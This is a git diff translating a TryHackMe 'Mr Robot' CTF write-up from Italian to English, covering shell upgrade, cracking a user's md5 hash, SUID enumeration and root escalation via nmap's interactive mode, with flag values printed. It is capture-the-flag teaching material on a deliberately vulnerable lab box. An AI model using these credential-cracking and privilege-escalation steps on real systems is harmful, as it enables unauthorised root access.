--- a/CTF-TryHackMe/2. Medium/Mr Robot CTF/5. Shell.md
+++ b/CTF-TryHackMe/2. Medium/Mr Robot CTF/5. Shell.md
@@ -1,12 +1,20 @@
-1) Upgrade shell con python: python -c 'import pty; pty.spawn("/bin/bash")'
-2) Nella directory /home/robot troverai la password sottoforma di hash md5
+1) Upgrade shell with python: 
+```
+python -c 'import pty; pty.spawn("/bin/bash")'
+```
+2) In the /home/robot directory you will find the password in the form of an md5 hash
+```
 daemon@linux:/home/robot$ cat password.raw-md5
 cat password.raw-md5
 robot:c3fcd3d76192e4007dfb496cca67e13b
-
-3)  Sul sito  Crackstation è semplice trovare la corrispondenza: abcdefghijklmnopqrstuvwxyz
-4) Poi digiti: su robot     
-5) Una volta che avrai digitato la password è fai l'accesso all'account robot ti trovi la seconda chiave:
+```
+3) On the Crackstation site it is easy to find a match: ```
+```
+abcdefghijklmnopqrstuvwxyz
+```
+4) Then type: `su robot`    
+5) Once you have entered the password and log into the robot account, you will find the second key:
+```
 daemon@linux:/home/robot$ su robot 
 su robot 
 Password: abcdefghijklmnopqrstuvwxyz
@@ -21,8 +29,9 @@ robot@linux:~$ cat key-2-of-3.txt
 cat key-2-of-3.txt
 822c73956184f694993bede3eb39f959   <------- Seconda Chiave
 robot@linux:~$  
-
-6) Cerchiamo File binari che possiamo eseguire come sudo: 
+```
+6) We are looking for binaries that we can run as sudo: 
+```
 robot@linux:/bin$  find / -perm +6000 2>/dev/null | grep "/bin/"
  find / -perm +6000 2>/dev/null | grep "/bin/"
 /bin/ping
@@ -48,14 +57,11 @@ robot@linux:/bin$  find / -perm +6000 2>/dev/null | grep "/bin/"
 /usr/bin/wall
 /usr/local/bin/nmap
 robot@linux:/bin$ 
-
-7) Richiami la shell interattiva di nmap:  nmap --interactive
-8) E poi nella shell interattiva digiti: !sh
----> Questo farà spawnare una shell e dato che è eseguita solo da root farà spawnare proprio la 
-        shell root
-
-9) Accediamo alla directory e mandi in output la terza chiave: 
-
+```
+7) Call nmap's interactive shell:  `nmap --interactive`
+8) And then in the interactive shell you type: `!sh`
+9) We access the directory and output the third key:
+```
 robot@linux:/$ nmap --interactive
 nmap --interactive
 
@@ -75,7 +81,7 @@ firstboot_done  key-3-of-3.txt
 cat key-3-of-3.txt
 04787ddef27c3dee1ee161b21670b4e4      <---- Terza Flag
 # 
-
+```
 
 
 
